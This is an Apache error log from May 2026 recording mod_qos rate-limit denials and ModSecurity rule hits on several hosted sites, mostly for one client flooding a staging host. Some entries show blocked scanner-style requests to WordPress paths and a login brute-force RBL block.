[Tue May 26 19:59:45.621819 2026] [qos:error] [pid 93576:tid 93734] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWWDRMqfxdEDkosz1SQAAABY
[Tue May 26 19:59:45.676496 2026] [security2:error] [pid 106517:tid 106658] [client 103.163.220.42:46043] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/"] [unique_id "ahWuWYZZc2DoU1lPnP1SiwAAAI0"]
[Tue May 26 19:59:45.738031 2026] [qos:error] [pid 93576:tid 93809] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWWDRMqfxdEDkosz1SwAAAGE
[Tue May 26 19:59:45.739329 2026] [qos:error] [pid 93868:tid 94357] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25_BgAAAfI
[Tue May 26 19:59:45.745356 2026] [qos:error] [pid 93576:tid 93738] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWWDRMqfxdEDkosz1TAAAABo
[Tue May 26 19:59:45.765818 2026] [qos:error] [pid 93868:tid 94295] [client 45.148.10.120:35284] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25_BwAAAbQ
[Tue May 26 19:59:45.769048 2026] [qos:error] [pid 93576:tid 93798] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWWDRMqfxdEDkosz1TQAAAFY
[Tue May 26 19:59:45.770880 2026] [qos:error] [pid 93868:tid 94340] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25_CAAAAeE
[Tue May 26 19:59:45.771286 2026] [qos:error] [pid 93868:tid 94359] [client 45.148.10.120:35398] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25_CQAAAfQ
[Tue May 26 19:59:45.775589 2026] [qos:error] [pid 93576:tid 93720] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWWDRMqfxdEDkosz1TgAAAAg
[Tue May 26 19:59:45.776914 2026] [qos:error] [pid 93868:tid 94275] [client 45.148.10.120:34936] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25_CgAAAaA
[Tue May 26 19:59:45.778812 2026] [qos:error] [pid 93868:tid 94367] [client 45.148.10.120:34910] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25_CwAAAfw
[Tue May 26 19:59:45.888179 2026] [qos:error] [pid 93576:tid 93774] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWWDRMqfxdEDkosz1UAAAAD4
[Tue May 26 19:59:45.892311 2026] [qos:error] [pid 93868:tid 94298] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25_EAAAAbc
[Tue May 26 19:59:45.896726 2026] [qos:error] [pid 93576:tid 93728] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWWDRMqfxdEDkosz1UQAAABA
[Tue May 26 19:59:45.916217 2026] [qos:error] [pid 93868:tid 94337] [client 45.148.10.120:35284] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25_EQAAAd4
[Tue May 26 19:59:45.918373 2026] [qos:error] [pid 93576:tid 93713] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWWDRMqfxdEDkosz1UgAAAAE
[Tue May 26 19:59:45.920840 2026] [qos:error] [pid 93868:tid 94265] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25_EgAAAZY
[Tue May 26 19:59:45.927521 2026] [qos:error] [pid 93868:tid 94328] [client 45.148.10.120:35398] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25_EwAAAdU
[Tue May 26 19:59:45.929283 2026] [qos:error] [pid 93576:tid 93756] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWWDRMqfxdEDkosz1UwAAACw
[Tue May 26 19:59:45.931707 2026] [qos:error] [pid 93868:tid 94356] [client 45.148.10.120:34936] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25_FAAAAfE
[Tue May 26 19:59:45.932450 2026] [qos:error] [pid 93868:tid 94303] [client 45.148.10.120:34910] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWUqK9k_ZUB2Vp25_FQAAAbw
[Tue May 26 19:59:46.102337 2026] [qos:error] [pid 93576:tid 93777] [client 45.148.10.120:35204] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWmDRMqfxdEDkosz1WAAAAEE
[Tue May 26 19:59:46.105659 2026] [qos:error] [pid 93868:tid 94316] [client 45.148.10.120:35284] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWkqK9k_ZUB2Vp25_GAAAAck
[Tue May 26 19:59:46.107854 2026] [qos:error] [pid 93576:tid 93729] [client 45.148.10.120:35356] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWmDRMqfxdEDkosz1WQAAABE
[Tue May 26 19:59:46.109128 2026] [qos:error] [pid 93868:tid 94273] [client 45.148.10.120:35116] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWkqK9k_ZUB2Vp25_GQAAAZ4
[Tue May 26 19:59:46.109297 2026] [qos:error] [pid 93576:tid 93819] [client 45.148.10.120:34960] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWmDRMqfxdEDkosz1WgAAAGs
[Tue May 26 19:59:46.109686 2026] [qos:error] [pid 93868:tid 94294] [client 45.148.10.120:35296] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWkqK9k_ZUB2Vp25_GgAAAbM
[Tue May 26 19:59:46.113069 2026] [qos:error] [pid 93868:tid 94297] [client 45.148.10.120:35398] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWkqK9k_ZUB2Vp25_GwAAAbY
[Tue May 26 19:59:46.115224 2026] [qos:error] [pid 93868:tid 94335] [client 45.148.10.120:34910] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWkqK9k_ZUB2Vp25_HAAAAdw
[Tue May 26 19:59:46.115505 2026] [qos:error] [pid 93576:tid 93717] [client 45.148.10.120:35094] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWmDRMqfxdEDkosz1WwAAAAU
[Tue May 26 19:59:46.116697 2026] [qos:error] [pid 93868:tid 94358] [client 45.148.10.120:34936] mod_qos(010): access denied, QS_LocRequestLimit* rule: /(100), concurrent requests=101, c=45.148.10.120, id=ahWuWkqK9k_ZUB2Vp25_HQAAAfM
[Tue May 26 19:59:46.177464 2026] [security2:error] [pid 106517:tid 106688] [client 103.163.220.33:60553] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/3PJcpMFsD8B.php"] [unique_id "ahWuWoZZc2DoU1lPnP1SlgAAAKo"]
[Tue May 26 19:59:46.275109 2026] [security2:error] [pid 93868:tid 94380] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWEqK9k_ZUB2Vp25-owAAAgk"]
[Tue May 26 19:59:46.282491 2026] [security2:error] [pid 106517:tid 106546] [remote 176.95.46.127:57734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 127.46.95.176.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWuWoZZc2DoU1lPnP1SlAAAsxo"]
[Tue May 26 19:59:46.282610 2026] [security2:error] [pid 93868:tid 94334] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuV0qK9k_ZUB2Vp25-awAAAds"]
[Tue May 26 19:59:46.291096 2026] [security2:error] [pid 106517:tid 106713] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWIZZc2DoU1lPnP1SOwAAAMM"]
[Tue May 26 19:59:46.293863 2026] [security2:error] [pid 93868:tid 94349] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWEqK9k_ZUB2Vp25-jQAAAeo"]
[Tue May 26 19:59:46.299915 2026] [security2:error] [pid 93868:tid 94277] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWEqK9k_ZUB2Vp25-pAAAAaI"]
[Tue May 26 19:59:46.311950 2026] [security2:error] [pid 93576:tid 93716] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWGDRMqfxdEDkosz0-AAAAAQ"]
[Tue May 26 19:59:46.316193 2026] [security2:error] [pid 93576:tid 93737] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWGDRMqfxdEDkosz09gAAABk"]
[Tue May 26 19:59:46.318305 2026] [security2:error] [pid 106517:tid 106679] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWIZZc2DoU1lPnP1SQQAAAKE"]
[Tue May 26 19:59:46.319654 2026] [security2:error] [pid 93576:tid 93770] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWGDRMqfxdEDkosz1AQAAADo"]
[Tue May 26 19:59:46.321142 2026] [security2:error] [pid 106517:tid 106723] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWIZZc2DoU1lPnP1SQgAAAM0"]
[Tue May 26 19:59:46.325047 2026] [security2:error] [pid 93868:tid 94336] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWEqK9k_ZUB2Vp25-oQAAAd0"]
[Tue May 26 19:59:46.330653 2026] [security2:error] [pid 106517:tid 106729] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWIZZc2DoU1lPnP1SVAAAANM"]
[Tue May 26 19:59:46.332086 2026] [security2:error] [pid 93576:tid 93813] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWGDRMqfxdEDkosz0_wAAAGU"]
[Tue May 26 19:59:46.339422 2026] [security2:error] [pid 106517:tid 106774] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWIZZc2DoU1lPnP1SRQAAAQA"]
[Tue May 26 19:59:46.340827 2026] [security2:error] [pid 93576:tid 93796] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWWDRMqfxdEDkosz1JQAAAFQ"]
[Tue May 26 19:59:46.369111 2026] [security2:error] [pid 93576:tid 93833] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWGDRMqfxdEDkosz0-gAAAHk"]
[Tue May 26 19:59:46.382190 2026] [security2:error] [pid 93576:tid 93779] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWGDRMqfxdEDkosz1AwAAAEM"]
[Tue May 26 19:59:46.382796 2026] [security2:error] [pid 93576:tid 93824] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWWDRMqfxdEDkosz1KgAAAHA"]
[Tue May 26 19:59:46.391964 2026] [security2:error] [pid 93576:tid 93727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWWDRMqfxdEDkosz1KwAAAA8"]
[Tue May 26 19:59:46.392271 2026] [security2:error] [pid 106517:tid 106722] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWIZZc2DoU1lPnP1SOQAAAMw"]
[Tue May 26 19:59:46.404451 2026] [security2:error] [pid 93868:tid 94317] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWUqK9k_ZUB2Vp25-1gAAAco"]
[Tue May 26 19:59:46.405348 2026] [security2:error] [pid 93868:tid 94260] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWUqK9k_ZUB2Vp25-1QAAAZE"]
[Tue May 26 19:59:46.406614 2026] [security2:error] [pid 93576:tid 93765] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWWDRMqfxdEDkosz1LQAAADU"]
[Tue May 26 19:59:46.406701 2026] [security2:error] [pid 93868:tid 94327] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWUqK9k_ZUB2Vp25-1AAAAdQ"]
[Tue May 26 19:59:46.419386 2026] [security2:error] [pid 93576:tid 93825] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWWDRMqfxdEDkosz1KAAAAHE"]
[Tue May 26 19:59:46.422851 2026] [security2:error] [pid 106517:tid 106727] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWIZZc2DoU1lPnP1SVwAAANE"]
[Tue May 26 19:59:46.425952 2026] [security2:error] [pid 93576:tid 93746] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWWDRMqfxdEDkosz1NAAAACI"]
[Tue May 26 19:59:46.426806 2026] [security2:error] [pid 93868:tid 94293] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWUqK9k_ZUB2Vp25-3wAAAbI"]
[Tue May 26 19:59:46.430940 2026] [security2:error] [pid 93576:tid 93747] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWWDRMqfxdEDkosz1LAAAACM"]
[Tue May 26 19:59:46.431864 2026] [security2:error] [pid 93576:tid 93820] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWWDRMqfxdEDkosz1JgAAAGw"]
[Tue May 26 19:59:46.440704 2026] [security2:error] [pid 93868:tid 94307] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWUqK9k_ZUB2Vp25-3AAAAcA"]
[Tue May 26 19:59:46.676313 2026] [security2:error] [pid 106517:tid 106750] [client 103.163.220.10:52885] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/uploads/"] [unique_id "ahWuWoZZc2DoU1lPnP1SpwAAAOg"]
[Tue May 26 19:59:47.204401 2026] [security2:error] [pid 106517:tid 106663] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWuWoZZc2DoU1lPnP1SrAAAAJI"]
[Tue May 26 19:59:47.270139 2026] [security2:error] [pid 93868:tid 94335] [client 103.163.220.51:23233] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "rehobothindependentcare.com"] [uri "/wp-content/users.php"] [unique_id "ahWuW0qK9k_ZUB2Vp25_LQAAAdw"]
[Tue May 26 19:59:47.277073 2026] [security2:error] [pid 93868:tid 94272] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWUqK9k_ZUB2Vp25-3gAAAZ0"]
[Tue May 26 19:59:47.279196 2026] [security2:error] [pid 93868:tid 94332] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWUqK9k_ZUB2Vp25-8AAAAdk"]
[Tue May 26 19:59:47.283790 2026] [security2:error] [pid 93868:tid 94322] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWUqK9k_ZUB2Vp25-3QAAAc8"]
[Tue May 26 19:59:47.297849 2026] [security2:error] [pid 93576:tid 93736] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWWDRMqfxdEDkosz1OgAAABg"]
[Tue May 26 19:59:47.298959 2026] [security2:error] [pid 93868:tid 94361] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWUqK9k_ZUB2Vp25-4gAAAfY"]
[Tue May 26 19:59:47.300376 2026] [security2:error] [pid 93868:tid 94286] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWUqK9k_ZUB2Vp25-7AAAAas"]
[Tue May 26 19:59:47.302551 2026] [security2:error] [pid 93868:tid 94267] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWUqK9k_ZUB2Vp25-7QAAAZg"]
[Tue May 26 19:59:47.303953 2026] [security2:error] [pid 93868:tid 94354] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWUqK9k_ZUB2Vp25-6QAAAe8"]
[Tue May 26 19:59:47.307744 2026] [security2:error] [pid 106517:tid 106669] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWYZZc2DoU1lPnP1SggAAAJg"]
[Tue May 26 19:59:47.312076 2026] [security2:error] [pid 93868:tid 94365] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWUqK9k_ZUB2Vp25--QAAAfo"]
[Tue May 26 19:59:47.329390 2026] [security2:error] [pid 93868:tid 94321] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWUqK9k_ZUB2Vp25-9AAAAc4"]
[Tue May 26 19:59:47.329434 2026] [security2:error] [pid 93868:tid 94291] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWUqK9k_ZUB2Vp25-8QAAAbA"]
[Tue May 26 19:59:47.339927 2026] [security2:error] [pid 93576:tid 93778] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWWDRMqfxdEDkosz1QwAAAEI"]
[Tue May 26 19:59:47.339970 2026] [security2:error] [pid 93868:tid 94280] [client 45.148.10.120:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.staging.unsobered.com"] [uri "/index.php"] [unique_id "ahWuWUqK9k_ZUB2Vp25--wAAAaU"]
